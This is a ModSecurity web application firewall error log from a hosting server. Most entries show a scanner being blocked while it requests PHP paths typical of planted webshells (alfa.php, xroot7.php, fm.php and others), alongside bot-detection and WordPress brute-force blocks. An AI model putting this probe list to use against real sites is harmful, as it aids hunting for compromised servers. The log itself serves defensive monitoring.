[Tue May 26 19:07:07.018178 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:8378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/inputs.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjqAAAAKs"]
[Tue May 26 19:07:07.018262 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:8378] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/inputs.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjqAAAAKs"]
[Tue May 26 19:07:07.161799 2026] [security2:error] [pid 6038:tid 6247] [client 20.104.227.76:10317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/file2.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjrQAAANQ"]
[Tue May 26 19:07:07.161911 2026] [security2:error] [pid 6038:tid 6247] [client 20.104.227.76:10317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/file2.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjrQAAANQ"]
[Tue May 26 19:07:07.327573 2026] [security2:error] [pid 6038:tid 6197] [client 20.104.227.76:10726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/index/function.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjuQAAAKI"]
[Tue May 26 19:07:07.327671 2026] [security2:error] [pid 6038:tid 6197] [client 20.104.227.76:10726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/index/function.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjuQAAAKI"]
[Tue May 26 19:07:07.478242 2026] [security2:error] [pid 6038:tid 6182] [client 20.104.227.76:10505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wk/index.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjwAAAAJM"]
[Tue May 26 19:07:07.478338 2026] [security2:error] [pid 6038:tid 6182] [client 20.104.227.76:10505] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wk/index.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjwAAAAJM"]
[Tue May 26 19:07:07.662067 2026] [security2:error] [pid 6038:tid 6275] [client 20.104.227.76:10722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/alfa.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjyAAAAPA"]
[Tue May 26 19:07:07.662152 2026] [security2:error] [pid 6038:tid 6275] [client 20.104.227.76:10722] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/alfa.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qjyAAAAPA"]
[Tue May 26 19:07:07.807461 2026] [security2:error] [pid 6038:tid 6286] [client 20.104.227.76:8351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-theme.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qj0gAAAPs"]
[Tue May 26 19:07:07.807584 2026] [security2:error] [pid 6038:tid 6286] [client 20.104.227.76:8351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-theme.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qj0gAAAPs"]
[Tue May 26 19:07:07.957821 2026] [security2:error] [pid 6038:tid 6261] [client 20.104.227.76:10346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-file.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qj3wAAAOI"]
[Tue May 26 19:07:07.957956 2026] [security2:error] [pid 6038:tid 6261] [client 20.104.227.76:10346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-file.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qj3wAAAOI"]
[Tue May 26 19:07:08.140352 2026] [security2:error] [pid 6038:tid 6251] [client 20.104.227.76:10697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/default.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj5gAAANg"]
[Tue May 26 19:07:08.140522 2026] [security2:error] [pid 6038:tid 6251] [client 20.104.227.76:10697] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/default.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj5gAAANg"]
[Tue May 26 19:07:08.284538 2026] [security2:error] [pid 6038:tid 6244] [client 20.104.227.76:10706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/mah.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj7gAAANE"]
[Tue May 26 19:07:08.284652 2026] [security2:error] [pid 6038:tid 6244] [client 20.104.227.76:10706] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/mah.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj7gAAANE"]
[Tue May 26 19:07:08.306496 2026] [security2:error] [pid 6038:tid 6281] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiA1HA3ZmGrHHEr4qj1QAAAPY"]
[Tue May 26 19:07:08.434671 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:10327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/plugins.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj7wAAAQA"]
[Tue May 26 19:07:08.434765 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:10327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/plugins.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj7wAAAQA"]
[Tue May 26 19:07:08.593369 2026] [security2:error] [pid 6038:tid 6172] [client 20.104.227.76:10746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/sf.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj8wAAAIk"]
[Tue May 26 19:07:08.593459 2026] [security2:error] [pid 6038:tid 6172] [client 20.104.227.76:10746] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/sf.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj8wAAAIk"]
[Tue May 26 19:07:08.747424 2026] [security2:error] [pid 6038:tid 6275] [client 20.104.227.76:10342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/a.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj_wAAAPA"]
[Tue May 26 19:07:08.747556 2026] [security2:error] [pid 6038:tid 6275] [client 20.104.227.76:10342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/a.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qj_wAAAPA"]
[Tue May 26 19:07:08.938138 2026] [security2:error] [pid 6038:tid 6198] [client 20.104.227.76:8342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/k.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qkBwAAAKM"]
[Tue May 26 19:07:08.938212 2026] [security2:error] [pid 6038:tid 6198] [client 20.104.227.76:8342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/k.php"] [unique_id "ahWiBFHA3ZmGrHHEr4qkBwAAAKM"]
[Tue May 26 19:07:09.088325 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:10312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ini.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkDAAAAO8"]
[Tue May 26 19:07:09.088405 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:10312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ini.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkDAAAAO8"]
[Tue May 26 19:07:09.232202 2026] [security2:error] [pid 6038:tid 6225] [client 20.104.227.76:8366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ca4.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkEAAAAL4"]
[Tue May 26 19:07:09.232356 2026] [security2:error] [pid 6038:tid 6225] [client 20.104.227.76:8366] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ca4.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkEAAAAL4"]
[Tue May 26 19:07:09.388714 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:10698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkGAAAAIc"]
[Tue May 26 19:07:09.388832 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:10698] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkGAAAAIc"]
[Tue May 26 19:07:09.524572 2026] [security2:error] [pid 6038:tid 6221] [client 20.12.190.196:10059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkHQAAALo"]
[Tue May 26 19:07:09.524718 2026] [security2:error] [pid 6038:tid 6221] [client 20.12.190.196:10059] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkHQAAALo"]
[Tue May 26 19:07:09.565104 2026] [security2:error] [pid 6038:tid 6281] [client 20.104.227.76:8360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-info.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkHgAAAPY"]
[Tue May 26 19:07:09.565234 2026] [security2:error] [pid 6038:tid 6281] [client 20.104.227.76:8360] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-info.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkHgAAAPY"]
[Tue May 26 19:07:09.717485 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:10718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/init.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkJgAAAQA"]
[Tue May 26 19:07:09.717617 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:10718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/init.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkJgAAAQA"]
[Tue May 26 19:07:09.861427 2026] [security2:error] [pid 6038:tid 6232] [client 20.104.227.76:10558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/100.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkKgAAAMU"]
[Tue May 26 19:07:09.861517 2026] [security2:error] [pid 6038:tid 6232] [client 20.104.227.76:10558] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/100.php"] [unique_id "ahWiBVHA3ZmGrHHEr4qkKgAAAMU"]
[Tue May 26 19:07:10.013250 2026] [security2:error] [pid 6038:tid 6258] [client 20.104.227.76:8334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/fm.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkKwAAAN8"]
[Tue May 26 19:07:10.013374 2026] [security2:error] [pid 6038:tid 6258] [client 20.104.227.76:8334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/fm.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkKwAAAN8"]
[Tue May 26 19:07:10.165750 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "usai.glorodavionics.com"] [uri "/z.ph"] [unique_id "ahWiBlHA3ZmGrHHEr4qkMQAAAMA"]
[Tue May 26 19:07:10.166056 2026] [security2:error] [pid 6038:tid 6205] [client 20.104.227.76:10313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "usai.glorodavionics.com"] [uri "/z.ph"] [unique_id "ahWiBlHA3ZmGrHHEr4qkLwAAAKo"]
[Tue May 26 19:07:10.346225 2026] [security2:error] [pid 6038:tid 6212] [client 145.133.40.33:20865] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkPwAAALE"]
[Tue May 26 19:07:10.427683 2026] [security2:error] [pid 6038:tid 6289] [client 20.104.227.76:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "usai.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWiBlHA3ZmGrHHEr4qkSAAAAP4"]
[Tue May 26 19:07:10.432658 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:10330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "usai.glorodavionics.com"] [uri "/z.ph"] [unique_id "ahWiBlHA3ZmGrHHEr4qkRgAAAO8"]
[Tue May 26 19:07:10.506712 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:10313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xroot7.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkTAAAAK8"]
[Tue May 26 19:07:10.506797 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:10313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xroot7.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkTAAAAK8"]
[Tue May 26 19:07:10.545633 2026] [security2:error] [pid 6038:tid 6176] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkLgAAAI0"]
[Tue May 26 19:07:10.714965 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:10743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/mini.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkUgAAAIc"]
[Tue May 26 19:07:10.715071 2026] [security2:error] [pid 6038:tid 6170] [client 20.104.227.76:10743] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/mini.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkUgAAAIc"]
[Tue May 26 19:07:10.836915 2026] [security2:error] [pid 6038:tid 6267] [client 20.12.190.196:52538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkWAAAAOg"]
[Tue May 26 19:07:10.837018 2026] [security2:error] [pid 6038:tid 6267] [client 20.12.190.196:52538] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkWAAAAOg"]
[Tue May 26 19:07:10.837841 2026] [security2:error] [pid 6038:tid 6230] [client 145.133.40.33:20864] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkUwAAAMM"]
[Tue May 26 19:07:10.932724 2026] [security2:error] [pid 6038:tid 6169] [client 94.23.188.210:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ndequipments.com"] [uri "/robots.txt"] [unique_id "ahWiBlHA3ZmGrHHEr4qkYgAAAIY"]
[Tue May 26 19:07:10.932876 2026] [security2:error] [pid 6038:tid 6169] [client 94.23.188.210:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ndequipments.com"] [uri "/robots.txt"] [unique_id "ahWiBlHA3ZmGrHHEr4qkYgAAAIY"]
[Tue May 26 19:07:11.414085 2026] [security2:error] [pid 6038:tid 6177] [client 14.178.23.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiBlHA3ZmGrHHEr4qkZQAAAI4"]
[Tue May 26 19:07:12.297150 2026] [security2:error] [pid 6038:tid 6200] [client 167.114.139.2:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ndequipments.com"] [uri "/"] [unique_id "ahWiCFHA3ZmGrHHEr4qkrQAAAKU"]
[Tue May 26 19:07:12.297291 2026] [security2:error] [pid 6038:tid 6200] [client 167.114.139.2:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ndequipments.com"] [uri "/"] [unique_id "ahWiCFHA3ZmGrHHEr4qkrQAAAKU"]
[Tue May 26 19:07:12.883648 2026] [security2:error] [pid 6038:tid 6282] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiCFHA3ZmGrHHEr4qktAAAAPc"]
[Tue May 26 19:07:13.588593 2026] [security2:error] [pid 6038:tid 6132] [remote 18.219.113.49:56476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiCVHA3ZmGrHHEr4qk2QAAzl0"]
[Tue May 26 19:07:14.415140 2026] [security2:error] [pid 6038:tid 6239] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiCVHA3ZmGrHHEr4qk6QAAAMw"]
